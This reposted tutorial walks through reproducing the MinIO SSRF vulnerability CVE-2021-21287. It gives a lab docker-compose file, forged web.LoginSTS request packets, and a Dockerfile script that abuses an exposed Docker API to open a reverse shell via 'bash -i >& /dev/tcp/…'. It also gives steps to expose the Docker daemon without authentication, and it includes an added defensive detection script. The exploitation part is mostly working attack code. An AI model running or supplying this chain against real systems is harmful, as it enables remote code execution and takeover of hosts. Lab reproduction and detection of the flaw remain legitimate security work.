
How to analyze the MinIO unauthorized SSRF vulnerability CVE-2021-21287

2025-01-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com) 05/31 Report--

This article shows how to analyze the MinIO unauthenticated SSRF vulnerability CVE-2021-21287. The content is concise and easy to follow, and the detailed walkthrough below should leave you with something useful.

MinIO unauthorized SSRF vulnerability (CVE-2021-21287)

I. Brief introduction to the vulnerability

Because the LoginSTS interface of the MinIO component is improperly designed, it contains a server-side request forgery (SSRF) vulnerability.

An attacker can make the server issue forged requests by constructing a URL. An attacker who successfully exploits this vulnerability can use functionality reachable from the server to read or update internal resources, or to execute arbitrary commands.

The vulnerability can be exploited remotely without authentication.

II. Affected versions

MinIO < RELEASE.2021-01-30T00-20-58Z

III. Environment setup & vulnerability reproduction

Install MinIO with Docker: docker-compose.yml

version: '3.7'
services:
  minio1:
    image: minio/minio:RELEASE.2021-01-16T02-19-44Z
    volumes:
      - data1-1:/data1
      - data1-2:/data2
    ports:
      - "9000:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
  data1-1:
  data1-2:

Start the environment:

Home page style:

http://192.168.1.108:9000/minio/login

1. Verify SSRF

Request packet:

POST /minio/webrpc HTTP/1.1
Host: 192.168.1.104:1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/json
Connection: close
Content-Length: 79

{"id": 1, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}
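As an added defender's check, not code from the original write-up: in affected builds the LoginSTS handler takes the destination of its outbound STS request from the incoming request's Host header, which is why the packet above carries the attacker's address there. The script below parses constructed sample requests modelled on that packet, flags web.LoginSTS calls whose Host is not one of the server's own listener addresses, and compares release tags against the fixed version; the own_hosts set and the sample requests are assumptions.

```python
import json
import re
from datetime import datetime

# Constructed sample requests (not captured traffic). The first mirrors the
# write-up's packet; the others are ordinary console traffic to the server itself.
SAMPLE_REQUESTS = [
    'POST /minio/webrpc HTTP/1.1\r\nHost: 192.168.1.104:1234\r\n'
    'Content-Type: application/json\r\n\r\n'
    '{"id": 1, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}',
    'POST /minio/webrpc HTTP/1.1\r\nHost: 192.168.1.108:9000\r\n'
    'Content-Type: application/json\r\n\r\n'
    '{"id": 2, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}',
    'POST /minio/webrpc HTTP/1.1\r\nHost: 192.168.1.108:9000\r\n'
    'Content-Type: application/json\r\n\r\n'
    '{"id": 3, "jsonrpc": "2.0", "params": {"username": "minio", "password": "minio123"}, "method": "web.Login"}',
]

FIXED_RELEASE = "RELEASE.2021-01-30T00-20-58Z"
RELEASE_RE = re.compile(r"^RELEASE\.(\d{4}-\d{2}-\d{2})T(\d{2})-(\d{2})-(\d{2})Z$")


def release_timestamp(tag):
    """Convert a MinIO release tag to a datetime so tags compare chronologically."""
    m = RELEASE_RE.match(tag)
    if not m:
        raise ValueError("not a MinIO release tag: %r" % tag)
    date, hh, mm, ss = m.groups()
    return datetime.strptime("%sT%s:%s:%s" % (date, hh, mm, ss), "%Y-%m-%dT%H:%M:%S")


def is_vulnerable_release(tag):
    """Anything older than the fixed release falls in the affected range."""
    return release_timestamp(tag) < release_timestamp(FIXED_RELEASE)


def parse_webrpc(raw):
    """Return (path, Host header, JSON-RPC method) from a raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    path = lines[0].split(" ")[1]
    headers = {n.strip().lower(): v.strip() for n, _, v in (l.partition(":") for l in lines[1:])}
    method = json.loads(body).get("method") if body else None
    return path, headers.get("host", ""), method


def classify(raw, own_hosts):
    """'ssrf-attempt' when web.LoginSTS arrives with a Host the server does not own."""
    path, host, method = parse_webrpc(raw)
    if path != "/minio/webrpc" or method != "web.LoginSTS":
        return "other"
    return "login-sts" if host in own_hosts else "ssrf-attempt"
```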

2. SSRF reverse shell

Place the file under the web service: index.php (Apache)

Reverse shell file:

The Dockerfile is as follows:

FROM alpine:3.13
RUN apk add curl bash jq
RUN set -ex && \
    { \
      echo '#!/bin/bash'; \
      echo 'set -ex'; \
      echo 'target="http://192.168.1.108:2375"'; \
      echo 'jsons=$(curl -s -XGET "${target}/containers/json" | jq -r ".[] | @base64")'; \
      echo 'for item in ${jsons[@]}; do'; \
      echo 'name=$(echo $item | base64 -d | jq -r ".Image")'; \
      echo 'if [[ "$name" == *"minio/minio"* ]]; then'; \
      echo 'id=$(echo $item | base64 -d | jq -r ".ID")'; \
      echo 'break'; \
      echo 'fi'; \
      echo 'done'; \
      echo 'execid=$(curl -s -X POST "${target}/containers/${id}/exec" -H "Content-Type: application/json" --data-binary "{\"Cmd\": [\"bash\", \"-c\", \"bash -i >& /dev/tcp/192.168.1.104/888 0>&1\"]}" | jq -r ".ID")'; \
      echo 'curl -s -X POST "${target}/exec/${execid}/start" -H "Content-Type: application/json" --data-binary "{}"'; \
    } | bash

Exploitation packet:

POST /minio/webrpc HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/json
Connection: close
Content-Length: 79

{"id": 1, "jsonrpc": "2.0", "params": {"token": "test"}, "method": "web.LoginSTS"}

A short video was recorded for a clearer demonstration.

The process is tedious and the wait is long, so background music has been added.

Video:

The result of the operation in the video:

https://mp.weixin.qq.com/s/9OavrcdczSZDXler5IpiQQ

Note ⚠️:

That step is not shown in the process because the Docker API was already enabled on the local machine.

Reference for enabling the Docker API:

Open the docker service configuration file, find ExecStart=/usr/bin/dockerd and change it to

ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

then restart:

$ systemctl daemon-reload
$ systemctl restart docker

Note that this binds the Docker daemon on every interface with no authentication and no TLS; that exposure on port 2375 is exactly what the reverse-shell stage above relies on.

The above is how to analyze the MinIO unauthenticated SSRF vulnerability CVE-2021-21287. Have you learned anything new? If you want to learn more skills or enrich your knowledge, you are welcome to follow the industry information channel.
